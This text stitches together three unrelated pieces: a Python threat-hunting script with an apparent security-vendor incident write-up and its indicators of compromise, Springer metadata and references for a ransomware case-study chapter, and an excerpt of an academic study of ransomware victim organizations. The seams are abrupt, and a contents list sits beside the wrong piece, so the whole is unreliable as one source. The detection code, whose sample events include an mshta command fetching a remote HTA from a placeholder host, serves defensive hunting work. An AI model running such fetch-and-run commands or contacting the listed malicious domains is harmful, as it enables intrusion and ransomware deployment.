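
```python
import re
from dataclasses import dataclass
from typing import List, Tuple


@dataclass
class ProcEvent:
    """Minimal process-creation record (assumed shape; map it from Sysmon Event ID 1, 4688 or EDR data)."""
    image: str         # full path of the created process
    cmdline: str
    parent_image: str  # full path of the parent process


SYSTEM32 = "c:\\windows\\system32\\"


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def hunt(events: List[ProcEvent]) -> List[Tuple[int, str]]:
    """Return (event index, rule name) for every event matching one of the case's behaviours."""
    hits = []
    for idx, ev in enumerate(events):
        image, parent, cl = basename(ev.image), basename(ev.parent_image), ev.cmdline.lower()
        # mshta.exe pulling an HTA from a web server (the HTA loop does this repeatedly)
        if image == "mshta.exe" and re.search(r"https?://", cl):
            hits.append((idx, "mshta_remote_hta"))
        # net1.exe is normally spawned by net.exe; a direct call sidesteps net.exe-based detections
        if image == "net1.exe" and parent != "net.exe":
            hits.append((idx, "net1_direct"))
        # sc.exe stopping or disabling the Interactive Services Detection service
        if image == "sc.exe" and "ui0detect" in cl and ("stop" in cl or "disabled" in cl):
            hits.append((idx, "ui0detect_tampering"))
        # a process named dwm.exe that does not live in System32 (ngrok was stored as C:\Windows\dwm.exe)
        if image == "dwm.exe" and not ev.image.lower().startswith(SYSTEM32):
            hits.append((idx, "dwm_masquerade"))
    return hits


# Constructed sample telemetry; the hostname is a placeholder, not an indicator from the case.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\mshta.exe", "mshta http://hta-server.invalid/start.hta", r"C:\Windows\System32\cmd.exe"),
    ProcEvent(r"C:\Windows\System32\net1.exe", "net1 view /domain", r"C:\Windows\System32\cmd.exe"),
    ProcEvent(r"C:\Windows\System32\net1.exe", "net1 view /domain", r"C:\Windows\System32\net.exe"),  # benign path
    ProcEvent(r"C:\Windows\System32\sc.exe", "sc config UI0Detect start= disabled", r"C:\Windows\System32\cmd.exe"),
    ProcEvent(r"C:\Windows\dwm.exe", "dwm.exe", r"C:\Windows\System32\cmd.exe"),
    ProcEvent(r"C:\Windows\System32\dwm.exe", "dwm.exe", r"C:\Windows\System32\winlogon.exe"),  # genuine DWM
    ProcEvent(r"C:\Windows\System32\mshta.exe", r"mshta C:\Tools\local.hta", r"C:\Windows\explorer.exe"),  # local HTA
]


if __name__ == "__main__":
    for idx, rule in hunt(SAMPLE_EVENTS):
        print(f"[{rule}] {SAMPLE_EVENTS[idx].image}  {SAMPLE_EVENTS[idx].cmdline}")
```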

All of the above shows that these are very capable attackers. Although they used mostly known methods, they also showed some creativity to compromise targets successfully and move laterally inside them with ease and speed. However, they were still caught and mitigated by the SentinelOne agent before any harm was done.

As their HTA-serving server is still online, and since this campaign is still going strong, we recommend that security teams check for the following IOCs in their EDR data or SIEM and quickly mitigate any that are found, to prevent the ransomware from being deployed.

Indicators of Compromise

HTA Payload Servers
  • crt.officecloud[.]top
  • crt.globalsign[.]icu
  • mhennigan.safedatasystems[.]com

CS Beacon Server
  • ocspverisign[.]pw

Other Tools Used
  • ngrok.exe
  • Certificate signer: “Clubessential, LLC.”

Full Beacon Configuration


Ransomware Case Studies

Matthew Ryan

Part of the book series: Advances in Information Security (ADIS, volume 85)

First Online: 25 February 2021

This chapter examines four major ransomware cases, with the first major ransomware attack in 2013 being used as a template for developing an influx of attacks since 2016. The individual case studies were chosen based on their global impact on organisations and high-profile media reports surrounding the attacks. The case study analysis process analysed the attack methodology and the outcome of each attack to determine similarities and evolutionary changes between each subsequent attack. The analysis also sought to detail the method and sophistication level of each attack, the encryption process and request for payment. These components provide the foundation for further understanding the rising threat posed by ransomware in later chapters.


Note: Four case studies were deemed an appropriate number to accurately demonstrate the evolution of major ransomware attack profiles over a six-year period.

Note: In 2018, an FBI investigation into WannaCry identified Marcus Hutchins as MalwareTech. Whilst Hutchins was initially hailed as a hero for his role in stopping WannaCry, he was later arrested and has pleaded guilty to developing the Kronos malware. Kronos was a piece of malware used to steal banking credentials. (See Winder 2019.)

Note: The term “crown jewels” is a cybersecurity term synonymous with high-value data and systems. The term broadly applies to an organisation’s high-value data which typically includes intellectual property, customer data and privileged user account information.

M. Alazab, Profiling and classifying the behavior of malicious codes. J. Syst. Softw. 100, 91–102 (2015)

R. Anderson, GameOver Zeus botnet disrupted: Collaborative effort among international partners, 7 Nov 2014

M. Anderson, ‘NotPetya’: Latest ransomware is a warning note from the future, IEEE Spectrum (2017). Available online: https://spectrum.ieee.org/tech-talk/computing/it/notpetya-latest-ransomware-is-a-warning-note-from-the-future (accessed 22 Feb 2019)

Australian Tax Office, Scam alerts (2020). Available online: https://www.ato.gov.au/general/online-services/identity-security/scam-alerts/ (accessed 17 Aug 2020)

B. Bechtol, Enabling violence and instability, in North Korean Military Proliferation in the Middle East and Africa, vol. 44 (University Press of Kentucky, 2018)

C. Beek, Necurs Botnet leads the world in sending spam traffic, McAfee Labs (11 Mar 2018). Available online: https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/necurs-botnet-leads-the-world-in-sending-spam-traffic/ (accessed 13 June 2018)

A. Berry, J. Homan, R. Eitzman, WannaCry malware profile, FireEye Threat Research (2017). Available online: https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html (accessed 2 Jan 2019)

T. Bossert, Press briefing on the attribution of the WannaCry malware attack to North Korea, 19 Dec 2017

T. Brewster, Google warns ransomware boom scored crooks $2 million a month, Forbes (25 July 2019) 2017. Available online: https://www.forbes.com/sites/thomasbrewster/2017/07/25/google-ransomware-multi-million-dollar-business-with-locky-and-cerber/#758974576caf (accessed 17 Jan 2019)

E. Bursztein, K. McRoberts, L. Invernizzi, Tracking desktop ransomware payments, Black Hat, Las Vegas, 2017

S. Chow, Hacked: The Bangladesh Bank Heist, Aljazeera (24 May 2018). Available online: https://www.aljazeera.com/programmes/101east/2018/05/hacked-bangladesh-bank-heist-180523070038069.html (accessed 13 Nov 2018)

C. Cimpanu, M.E.Doc software was backdoored 3 times, servers left without updates since 2013, Bleeping Computer, 6 July 2017

M. Conti, A. Gangwal, S. Ru, On the economic significance of ransomware campaigns: A bitcoin transactions perspective. Comput. Secur. 79, 162–189 (2018)

Department of Homeland Security, Alert (TA17-132A): Indicators associated with WannaCry ransomware (12 May 2017)

P. Ducklin, Ransomware – “Locky” ransomware – what you need to know, Naked Threats (2016). Available online: https://nakedsecurity.sophos.com/2016/02/17/locky-ransomware-what-you-need-to-know/ (accessed 24 Feb 2019)

K. Eichensehr, Three questions on the WannaCry attribution to North Korea, Just Security (2017). Available online: https://www.justsecurity.org/49889/questions-wannacry-attribution-north-korea/ (accessed 10 June 2018)

N. Etaher, G. Weir, M. Alazab, From ZeuS to Zitmo: Trends in banking malware, in IEEE International Conference on Trust, Security and Privacy in Computing and Communications (Trustcom, IEEE, Piscataway, 2015)

Federal Bureau of Investigation, FBI Alert – Identification of ransomware variant called Locky, 11 July 2016

L. Garber, Government officials disrupt two major cyberattack systems. Computer 47(7), 16–21 (2014)

A. Gazet, Comparative analysis of various ransomware virii. J. Comput. Virol. 6(1), 77–90 (2010)

D. Gerstein, WannaCry virus: A lesson in global unpreparedness. Available online: https://www.rand.org/blog/2017/05/wannacry-virus-a-lesson-in-global-unpreparedness.html (accessed 3 June 2018)

A. Greenberg, The untold story of NotPetya, the most devastating cyber attack in history, WIRED (2018a). Available online: https://www.wired.com/story/notpetya-cyberattack-ukraine-russia-code-crashed-the-world/ (accessed 23 Jan 2019)

A. Greenberg, The WannaCry ransomware hackers made some real amateur mistakes, WIRED (2018b). Available online: https://www.wired.com/2017/05/wannacry-ransomware-hackers-made-real-amateur-mistakes/ (accessed 5 June 2018)

A. Ivanov, O. Mamedov, ExPetr/Petya/NotPetya is a wiper, not ransomware (2017). Available online: https://securelist.com/expetrpetyanotpetya-is-a-wiper-not-ransomware/78902/ (accessed 14 Dec 2018)

K. Jarvis, CryptoLocker ransomware, Threats & Defenses Threat Analysis (2013). Available online: https://www.secureworks.com/research/cryptolocker-ransomware (accessed 3 Jan 2019)

L. Kessem, The Necurs Botnet: A Pandora’s box of malicious spam, IBM Security Intelligence (24 Apr 2017). Available online: https://securityintelligence.com/the-necurs-botnet-a-pandoras-box-of-malicious-spam/ (accessed 22 Feb 2019)

M. Korolov, Ransomware took in $1 billion in 2016 – improved defenses may not be enough to stem the tide, CSO (5 Jan 2017). Available online: https://www.csoonline.com/article/3154714/ransomware-took-in-1-billion-in-2016-improved-defenses-may-not-be-enough-to-stem-the-tide.html (accessed 11 Feb 2019)

P. Kruse, Locky spreading through Facebook (20 Nov 2016). Available online: https://twitter.com/peterkruse/status/800414481545187328 (accessed 2 Mar 2019)

E. Lucas, Cyberphobia: Identity, Trust, Security and the Internet (Bloomsbury Publishing, London, 2015)

L. Matthew, Boeing is the latest WannaCry ransomware victim, Forbes (2018). Available online: https://www.forbes.com/sites/leemathews/2018/03/30/boeing-is-the-latest-wannacry-ransomware-victim/#218e8ea96634 (accessed 1 June 2018)

D. Maynor, M. Olney, Y. Younan, The MeDoc connection, Cisco TALOS. Available online: https://blog.talosintelligence.com/2017/07/the-medoc-connection.html (accessed 22 Feb 2019)

A. McLean, WannaCry reportedly hitting speed cameras in Victoria, ZDNet (2017). Available online: https://www.zdnet.com/article/wannacry-reportedly-hitting-speed-cameras-in-victoria/ (accessed 2 April 2018)

A. McNeil, How did the WannaCry ransomworm spread?, Blog.Malwarebytes.com (30 May 2017). Available online: https://blog.malwarebytes.com/cybercrime/2017/05/how-did-wannacry-ransomworm-spread/ (accessed 10 June 2018)

D. Meyer, WannaCry ransoms suddenly leave attackers’ Bitcoin wallets, Fortune (2017). Available online: http://fortune.com/2017/08/03/wannacry-ransom-bitcoin/ (accessed 11 June 2018)

M. Molloy, Operation Tovar: The latest attempt to eliminate key botnets, Threat Research (2014). Available online: https://www.fireeye.com/blog/threat-research/2014/07/operation-tovar-the-latest-attempt-to-eliminate-key-botnets.html (accessed 13 Dec 2018)

National Audit Office, Investigation: WannaCry Cyber Attack and the NHS (National Audit Office, London, 2018)

National Health Service, Statement on reported NHS cyber-attack, 13 May 2017

L.H. Newman, The ransomware meltdown experts warned about is here, WIRED (2017). Available online: https://www.wired.com/story/eternalblue-leaked-nsa-spy-tool-hacked-world/ (accessed 6 June 2018)

L.H. Newman, The leaked NSA spy tool that hacked the world, WIRED (2018). Available online: https://www.wired.com/story/eternalblue-leaked-nsa-spy-tool-hacked-world/ (accessed 6 June 2018)

A. Palisse, H. Le Bouder, J.-L. Lanet, C. Le Guernic, A. Legay, Ransomware and the Legacy Crypto API, in The 11th International Conference on Risks and Security of Internet and Systems, Roscoff, France, 5–7 September 2016 (Springer, 2016)

D. Palmer, Locky ransomware: Why this menace keeps coming back, ZDNet (7 Sept 2017). Available online: https://www.zdnet.com/article/locky-ransomware-why-this-menace-keeps-coming-back/ (accessed 27 Feb 2019)

S. Ragan, Malicious images on Facebook lead to Locky ransomware, CSO (2016). Available online: https://www.csoonline.com/article/3143173/malicious-images-on-facebook-lead-to-locky-ransomware.html (accessed 14 Feb 2019)

O. Ralph, R. Armstrong, Mondelez sues Zurich in test for cyber hack insurance, Financial Times, New York, 10–11 Jan 2019

M. Rivero, Locky ransomware returns to the game with two new flavors (25 Aug 2017). Available online: https://blog.malwarebytes.com/cybercrime/2017/08/locky-ransomware-returns-to-the-game-with-two-new-flavors/ (accessed 25 Feb 2019)

J. Saarinen, Hackers launch massive Locky ransomware campaign, itNews (1 Sept 2017). Available online: https://www.itnews.com.au/news/hackers-launch-massive-locky-ransomware-campaign-472295 (accessed 21 Feb 2019)

J. Shea, How is NATO meeting the challenge of cyberspace? PRISM 7(2), 18–29 (2017)

J. Smith, Hospital pays hackers $17,000 in Bitcoins to return computer network, ZDNet (18 Feb 2016). Available online: https://www.zdnet.com/article/hospital-pays-hackers-17000-in-bitcoins-to-return-computer-network/ (accessed 22 Feb 2019)

K. Sood, S. Hurley, NotPetya technical analysis – a triple threat: File encryption, MFT encryption, credential theft (29 June 2017). Available online: https://www.crowdstrike.com/blog/petrwrap-ransomware-technical-analysis-triple-threat-file-encryption-mft-encryption-credential-theft/ (accessed 4 Mar 2019)

Symantec, Ransom.WannaCry (2017). Available online: https://www.symantec.com/security-center/writeup/2017-051310-3522-99 (accessed 7 June 2018)

A. Taylor, NotPetya Malware Attributed (16 Feb 2018)

S. Thakkar, Ransomware – Exploring the electronic form of extortion. Int. J. Sci. Res. Dev. 2(10), 123–126 (2014)

G. Troy, Locky ransomware attacks ramp up (28 Apr 2017). Available online: https://blog.appriver.com/2017/08/locky-ransomware-attacks-increase (accessed 23 Feb 2019)

A. Winckles, Here’s how the ransomware attack was stopped – and why it could soon start again, The Conversation (2017). Available online: https://theconversation.com/heres-how-the-ransomware-attack-was-stopped-and-why-it-could-soon-start-again-77745 (accessed 21 Nov 2018)

D. Winder, WannaCry hero Marcus Hutchins pleads guilty to creating banking malware, Forbes (20 Apr 2019). Available online: https://www.forbes.com/sites/daveywinder/2019/04/20/wannacry-hero-marcus-hutchins-pleads-guilty-to-creating-banking-malware/#13f645a4513e (accessed 23 June 2019)

J. Wolff, You’ll See This Message When It Is Too Late: The Legal and Economic Aftermath of Cybersecurity Breaches (The MIT Press, Cambridge, 2018)


Author information

Matthew Ryan, Maroubra, NSW, Australia


Copyright information

© 2021 The Author(s), under exclusive license to Springer Nature Switzerland AG

About this chapter

Ryan, M. (2021). Ransomware Case Studies. In: Ransomware Revolution: The Rise of a Prodigious Cyber Threat. Advances in Information Security, vol 85. Springer, Cham. https://doi.org/10.1007/978-3-030-66583-8_5


DOI: https://doi.org/10.1007/978-3-030-66583-8_5

Published: 25 February 2021

Publisher Name: Springer, Cham

Print ISBN: 978-3-030-66582-1

Online ISBN: 978-3-030-66583-8

eBook Packages: Computer Science, Computer Science (R0)


Article Contents

  • Introduction
  • Review of prior work
  • Hypotheses development
  • Research method and analysis of findings
  • Interpretation and discussion
  • Conclusions
  • Acknowledgements
  • Appendix 1: Profile of participant organizations and corresponding attacks characteristics
  • Appendix 2: Sample interview questions (phase 1)
  • Appendix 3: Impact assessment exercise exemplar
  • Appendix 4: Sample interview questions (phase 2)
  • Appendix 5: Criteria used to assess the security posture of organizations
  • Appendix 6: Security posture exemplars
  • Appendix 7: Profile of organizations


An empirical study of ransomware attacks on organizations: an assessment of severity and salient factors affecting vulnerability


Lena Yuryna Connolly, David S Wall, Michael Lang, Bruce Oddson, An empirical study of ransomware attacks on organizations: an assessment of severity and salient factors affecting vulnerability, Journal of Cybersecurity , Volume 6, Issue 1, 2020, tyaa023, https://doi.org/10.1093/cybsec/tyaa023


This study looks at the experiences of organizations that have fallen victim to ransomware attacks. Using quantitative and qualitative data of 55 ransomware cases drawn from 50 organizations in the UK and North America, we assessed the severity of the crypto-ransomware attacks experienced and looked at various factors to test if they had an influence on the degree of severity. An organization’s size was found to have no effect on the degree of severity of the attack, but the sector was found to be relevant, with private sector organizations feeling the pain much more severely than those in the public sector. Moreover, an organization’s security posture influences the degree of severity of a ransomware attack. We did not find that the attack target (i.e. human or machine) or the crypto-ransomware propagation class had any significant bearing on the severity of the outcome, but attacks that were purposefully directed at specific victims wreaked more damage than opportunistic ones.

In recent years, Europol’s annual Internet Organised Crime Threat Assessment report has consistently identified ransomware as a top priority; their latest bulletin states that ‘ransomware remains one of the, if not the, most dominant threats, especially for public and private organisations within as well as outside Europe’ [1]. Furthermore, as starkly evidenced by an international survey of 5000 IT managers, the incidence of ransomware attacks is growing exponentially [2]. Similar trends have been observed by government and law enforcement bodies [3, 4]. Ransomware attacks can potentially generate substantial financial rewards for offenders, but the ransom – which in most cases is not paid – is just a fraction of the overall cost of the attack in terms of reputational damage and loss of business [3, 5].

Since ransomware first arrived on the scene in a major way about the year 2013, the volume of academic literature produced on this topic has mushroomed. Important advances such as sophisticated detection methods and innovative intrusion prevention systems have been put forward. Organizations are advised to implement effective security education, introduce policies and technical controls, install antivirus software, promote strong e-mail hygiene, upgrade old systems, execute regular patching, apply the ‘least privileges’ approach, segregate the network perimeter and implement effective backup practices [6, 7]. Although the aforementioned types of work are of tremendous importance to a preventative strategy, they are not by themselves sufficient. This is because most of the research on ransomware to date has focused primarily on its technical aspects, with comparatively little attention being given to understanding the socio-technical side of the attack or the characteristics of organizations [8]. So, while there is a strong emphasis on developing ransomware countermeasures, there is a lack of studies that examine the real experiences of organizations that have actually fallen victim to ransomware attacks.

It may be tempting to assume certain things about what makes an organization more or less vulnerable to an attack, but we should not be so presumptuous. Although research on cybercrime victimization has significantly expanded over the past two decades, the majority of studies focus on individual-level offences such as online bullying, harassment and stalking. Holt and Bossler [9] make the point that for some types of cybercrime, such as malware and ransomware, our understanding of what causes individuals and organizations to fall victim is not well developed. Our work addresses this limitation by focusing on ransomware crime and collecting data from the actual victims of ransomware.

Generally, the risk of cybercrime victimization has been addressed by studying characteristics of the offender [10], the victim [11] and the crime itself [12]. Our article focuses on the latter two and is motivated by several calls in the literature to better understand typical victims of ransomware attacks, with a view towards developing solutions that prevent or mitigate this sinister problem [9, 13, 14].

To date, only a small number of studies have directly looked at the experiences of organizations that have fallen victim to ransomware. Of these few (see Table 1), the majority consider things at a rather cursory level. Our study, which is based on a substantial sample of 55 ransomware attacks and draws upon qualitative and quantitative data, helps to address this gap in the literature by presenting detailed findings on the antecedents and consequences of actual ransomware attacks within 50 organizations. Our objectives were to:

  • Assess the degree of severity of ransomware attacks within organizations;
  • Explore how characteristics of the organization and characteristics of the attack affect the severity of the outcome.

Table 1: Previous empirical studies of ransomware attacks on organizations (authors; country; method; sample; main findings)

  • Choi et al. (USA). Method: quantitative analysis of secondary data. Sample: 13 reported attacks on police departments from 2013 to 2016. Main findings: online lifestyle and cybersecurity stance contribute to ransomware victimization.
  • Zhao et al. (USA). Method: mixed methods case study: questionnaire and interviews. Sample: medical students and surgeons in a hospital that experienced a SamSam ransomware attack (29 survey respondents; 8 interviewees). Main findings: students who are ‘digital natives’ were seriously stressed by lack of access to electronic resources and were not well adapted to adjust to paper-based workflows.
  • Zhang-Kennedy et al. (USA). Method: mixed methods case study: questionnaire and interviews. Sample: staff and students in a large university that experienced a ransomware attack at a critical time (150 survey respondents; 30 interviewees). Main findings: it took several days to recover basic services and the after-effects on user productivity were felt for a considerable time afterward; substantial data loss and emotional effects on staff.
  • Hull et al. [18] (UK). Method: mixed methods: questionnaire and interviews. Sample: 46 questionnaire respondents and 8 interviews (university staff, students and SMEs). Main findings: universities are more likely to be attacked than SMEs; ransomware victims only had basic defences in place.
  • Shinde et al. [19] (The Netherlands). Method: mixed methods: questionnaire and interviews. Sample: snowball sample of 23 individuals and 2 semi-structured interviews. Main findings: most ransomware attacks use an untargeted ‘shotgun’ approach; security awareness among victims was low.
  • Ioanid et al. [20] (Romania). Method: questionnaire. Sample: survey of 123 SMEs. Main findings: organization size and turnover is positively correlated with number of attacks; manager education is key prevention factor.
  • Byrne and Thorpe [21] (Ireland). Method: brief interviews. Sample: three organizations that had suffered attacks. Main findings: e-mail filtering software had been removed because of the overhead it was placing on IT departments; in the wake of attacks, security training and awareness programmes were ramped up.
  • Riglietti (country not stated). Method: content analysis of discussions. Sample: 301 posts extracted from four online security blogs. Main findings: content analysis technique can increase our understanding of security challenges within organizations.

Within the literature on cybercrime in general, there have been various efforts to understand the factors that make individuals more prone to becoming victims. Drawing upon Lifestyle Theory and Routine Activity Theory, Agustina [23] proposes several behavioural and environmental factors that should, in theory at least, elevate the risk of being victimized. In practice, however, as found by Ngo and Paternoster [24], these theories do not hold up to empirical scrutiny. Our work differs from these previous studies in two ways: first, we are looking not at cybercrime in general, but specifically at ransomware attacks; secondly, our focus is not on individual victims, but rather on organizations.

Although several reports [1–4] suggest that the number of ransomware attacks against businesses continues to rise steadily, it is hard to form any clear sense of the true extent of ransomware attacks. The difficulty of accurately measuring and comparing cybercrime rates has been remarked upon by Furnell et al. [25]. Statistics about the incidence of ransomware attacks vary wildly. In an international study based on 574 participants across 77 countries, BCI [26] reported that 31% of respondents had been afflicted by ransomware. In contrast, a large-scale survey of Internet users in Germany revealed that only 3.6% of individuals had suffered a ransomware attack [27]. Simoiu et al. [5] estimated that about 2–3% of their sample of 1180 American adults were hit by ransomware between 2016 and 2017. Similarly, Ioanid et al. [20] reported that 2% of their sample of 103 Romanian small-to-medium enterprises (SMEs) were affected by the WannaCry attack that year. Against those low incidence rates, Hull et al. [18] found that as many as 61% of UK respondents had experienced at least one attack, and Shinde et al. [19] reported that 20% of respondents to their survey in the Netherlands were victims of ransomware, although it must be acknowledged that both those studies were based on quite small samples. All of these conflicting survey findings create a rather muddled picture. This, of course, can be put down to differences in sampling methods, response rates, temporal factors and units of analysis, but our essential point is this: it is generally agreed that ransomware presents a grave threat and has adversely affected many organizations, yet we know very little about the experiences of organizations that were attacked or the root causes that left them open to a successful violation.

There are very few empirical studies of the impact of ransomware within organizations or the factors that make organizations vulnerable. Al-Rimy et al. [28] present a literature survey of ransomware threat success factors, but the scope of their work extends only to infection vectors and enabling technologies (i.e. cryptography techniques, payment methods, ransomware development kits). They do not consider any organizational or socio-technical factors.

Our extensive search of the literature revealed just a handful of studies that looked directly at the experiences of organizations that were victims of ransomware (see Table 1). To summarize the key findings of these studies: ransomware attacks had major financial and emotional impact on victims, and the common factors that led to the attacks seemed to be a lack of security education or diligence, with organization type and size also emerging as possible factors impacting the likelihood of an attack.

Byrne and Thorpe [21] observe that ‘there is a gap in the literature with regards to examining the issue [of ransomware] from a company's perspective and that of its user base.’ Our study aims to make a contribution towards addressing this gap. In the next sections, we present a number of factors that we believe might affect the vulnerability of an organization to a ransomware attack, as well as characteristics of the attack weapon and method that could affect the severity of impact.

Organization characteristics: size and sector

As with so many of the reported facts and figures pertaining to ransomware, there is disagreement as to whether an organization’s size makes it more or less susceptible to attack. An international survey conducted by BCI [26] found that ransomware attacks are a substantially more common problem for large enterprises than they are for SMEs. However, contradictory findings are reported by Beazley [27], who state that SMEs were disproportionately hit by ransomware attacks in 2018, with 71% of all infections occurring within such organizations.

Many SMEs based in the UK believe that they are not likely to be targeted by ransomware attacks; while they place high value on the importance of IT to their business, they are generally not worried about the threat of data loss [29, 30]. SMEs, by their entrepreneurial nature, are more likely to engage in risk-taking behaviour [31]. However, SMEs may underestimate the value to hackers of their information systems and may not realize that they could be targeted as a hop to gain entry into their partners’ networks. As Smith [32] puts it, ‘even if you think your company has nothing worth stealing, losing access to all your data is no longer an unlikely event.’ Kurpjuhn [33] makes the point that SMEs must accept that they are exposed to similar levels of risk as large enterprises but have lower budgets and lesser resources to address those risks.

An argument could be made that larger organizations, simply because they employ more people, are at greater risk of infection due to human error; it only takes one reckless act by a single individual to compromise an entire network. Although not quite the same thing, Bergmann et al. [34] found no correlation between the size of a household and the rate of cybercrime victimization experienced by members of that household. How that finding would scale up to larger units in a non-domestic setting is a matter of conjecture, but it seems reasonable to assume that the potential for human error increases relative to the size of the unit.

Hypothesis 1a: An organization’s size influences the impact severity of a ransomware attack.
Hypothesis 1b: An organization’s sector influences the impact severity of a ransomware attack.

Security posture

Because ransomware combines technical and social characteristics to create its impact, we explore the organizational victim responses to attacks through the lens of ‘security posture’. Security posture is defined as ‘the security status of an enterprise’s networks, information, and systems based on information assurance resources (e.g., people, hardware, software, policies) and capabilities in place to manage the defense of the enterprise and to react as the situation changes’ [36]. Prior research into ransomware attacks on organizations shows that a lack of basic security practices, or failure to comply with them, was a common failing [15, 18]. Organizations that do not have adequate and effective backup strategies are much more likely to end up having to pay the ransom to retrieve their data [15, 28]. Connolly and Wall [8] developed a taxonomy of ransomware countermeasures, emphasizing a multi-layered approach in protecting organizations against ransomware.

While technical defence mechanisms are very important, so too is individual behaviour and good ‘online lifestyle’. Inadequate care by employees when choosing to open e-mail attachments or hyperlinks, downloading ‘free’ versions of software or cracked games, browsing adult content or illegal sports live streams, and installing apps from untrusted sources are all examples of poor online hygiene that can increase the risk of a ransomware infection. Riglietti [28] observed that ‘looking at what users say, avoiding infection appears to be a matter of spreading the right security culture within an organisation rather than a technical issue.’ A key part of this is education and awareness [37, 38]. In their studies of ransomware victims, Shinde et al. [19] and Zhang-Kennedy et al. [27] both observed a tendency by employees to assume that cybersecurity was essentially the responsibility of the IT Department. While it is to be expected that the IT Department should take the lead on security and actively promote a strong posture, there is an onus on individuals to utilize good personal security practices and not engage in irresponsible behaviour.

Hypothesis 1c: An organization’s security posture influences the impact severity of a ransomware attack.

Crypto-ransomware propagation class

Since crypto-ransomware was incapable of propagating on networks prior to 2013, we decided to create a simple taxonomy according to the degree of infectiousness (see Table 2 ). Different propagation classes of crypto-ransomware may have a lesser or greater effect on the outcome of a crypto-ransomware attack as a result of the volume of infection spread.

Table 2. Classification by crypto-ransomware propagation

Propagation class | Description | Examples
Generation I | Early variants of crypto-ransomware were not able to spread on networks and had limited propagation capabilities even within an infected machine (prior to 2013). | AIDS Information; GPCoder
Generation II | First emerged in 2013. This type can propagate by taking advantage of network paths: Generation II crypto-ransomware can encrypt devices that are physically and logically (e.g. ‘write’ access to server shares) connected to the infected machine. A common attack vector of Generation II crypto-ransomware is a malicious e-mail. | CryptoLocker; CryptoWall; CryptoDefence
Generation III.a (Trojans) | First emerged in 2016. This type uses various tools (e.g. the credential-dumping tool Mimikatz) and takes advantage of network weaknesses to propagate on infected networks. These variants can infect entire networks, completely crippling an organization’s ability to function. Generation III.a crypto-ransomware normally penetrates networks via vulnerable servers. | Samas; BitPaymer
Generation III.b (Worms) | First emerged in 2017. Generation III.b crypto-ransomware, also commonly referred to as ‘crypto-worms’, takes advantage of software vulnerabilities to propagate. Similar to variants like Samas and BitPaymer, crypto-worms can infect entire networks. | WannaCry; NotPetya

What we term ‘Generation I’ crypto-ransomware was not particularly effective in extorting money due to several technological shortcomings, such as the use of easy-to-break encryption, inefficient management of decryption keys and limited propagation capabilities. It is highly likely that Generation I variants are obsolete.

We refer to variants such as CryptoWall, CryptoLocker and CryptoDefence as ‘Generation II’. These forms of ransomware initially penetrate networks via desktops or laptops and subsequently take advantage of the local user security context to spread via network paths, encrypting network shares that the user has ‘write’ access to. They can also encrypt devices physically connected to the infected machine.

What we refer to as ‘Generation III.a’ malware are those such as Samas and BitPaymer that tend to breach networks via vulnerabilities found in servers [e.g. a weak password in Remote Desktop Protocol (RDP)]. Once inside the server, attackers manually and/or automatically search for various weaknesses within the network (e.g. poor authentication controls, a flat network structure, the lack of network visibility and detection mechanisms). Such vulnerabilities permit attackers to stay undetected and hijack multiple devices and the entire network in some cases. Crypto-worms like WannaCry (‘Generation III.b’ in our classification) have a similar devastating effect, the chief difference being that they take advantage exclusively of software vulnerabilities in order to propagate.

Hypothesis 2a: The crypto-ransomware propagation class influences the impact severity of a ransomware attack.

Attack type and target

Hypothesis 2b: The attack type, i.e. opportunistic or targeted, influences the impact severity of a ransomware attack.
Hypothesis 2c: The attack target, i.e. human or machine, influences the impact severity of a ransomware attack.

This study used a mixed methods approach following an exploratory sequential design [43]. Phase 1 was qualitative. In order to assess the degree of severity of ransomware attacks (our first objective), we required a measurement instrument. A literature search revealed that there are no readily available tools for this particular purpose. Since crypto-ransomware incidents entail some unique consequences (e.g. encrypted data, disabled systems), we could not use substitutes from other cybercrime studies; the assessment instrument had to be specific to crypto-ransomware attacks. Hence, the aim of Phase 1 was to inductively develop an Impact Assessment Instrument (grounded in empirical data) that can be used to effectively evaluate the severity of crypto-ransomware attacks on organizations in our sample. In Phase 2, we gathered additional quantitative data so as to be able to statistically test our hypotheses.

The Ethics Committee at the University of Leeds approved this research. Consent forms were signed by all study participants. All necessary precautions were followed to ensure the anonymity of study participants and the confidentiality of collected data. The majority of participants were from the UK but there were also a few from North America. Where the names of organizations are subsequently referred to in this article, aliases are used to protect the anonymity of respondents (see Appendix 1). Additionally, interviewees from UK Police Cybercrime Units are given the aliases of CyberRM, CyberLM, CyberTL, CyberBR, CyberBL, CyberTR and CyberCU. Incidents took place between 2014 and 2018.

Sampling strategy and data collection

A purposeful sampling approach was employed to collect data in Phase 1. We conducted 10 semi-structured interviews with professionals from organizations that became victims of ransomware attacks. Interviewees were IT/Security Managers and Executive Managers with an average of 17 years of professional experience. There was one respondent per organization. Since some organizations were attacked more than once, accounts of 15 ransomware incidents were elicited from 10 organizations. Appendix 1 (the first 15 incidents) contains information about the characteristics of the attacks and organizations that were interviewed in Phase 1.

In order to enhance the reliability and richness of data, we sought access to individuals who had direct experience of responding to crypto-ransomware incidents. As for the crypto-ransomware attacks themselves, the key selection criterion was to include a range of consequences for the victims, varying from low severity (e.g. minimum disruption to business, minimum loss of information, swift recovery) to high impact (e.g. business disruption that lasted for several months, significant loss of critical information, slow recovery).

An interview guide was designed with the aim of learning about participants’ perceptions of the attacks’ impact and the factors that aggravated or moderated the consequences of these incidents. This exercise guided the development of the Impact Assessment Instrument. Since we planned to use these initial 15 cases in Phase 2 of the data analysis, we also ensured that we collected profile information about the organizations (e.g. size, sector and industry), the causes of the crypto-ransomware attacks, information about security postures and the characteristics of the attacks (e.g. attack type, crypto-ransomware propagation class and attack vector). Sample interview questions are provided in Appendix 2. Six interviews were conducted face-to-face, three via Skype with overseas respondents and one via e-mail correspondence.

The decision to stop data collection in qualitative research is made when additional insights are no longer emerging from new observations. This point is typically achieved after a dozen or so observations [44]. We felt that after examining about 10 ransomware incidents, the incremental learning stopped. But to ensure that the point of ‘theoretical saturation’ had been sufficiently reached, we collected data on 15 cases in total.

Impact Assessment Instrument development (qualitative data analysis)

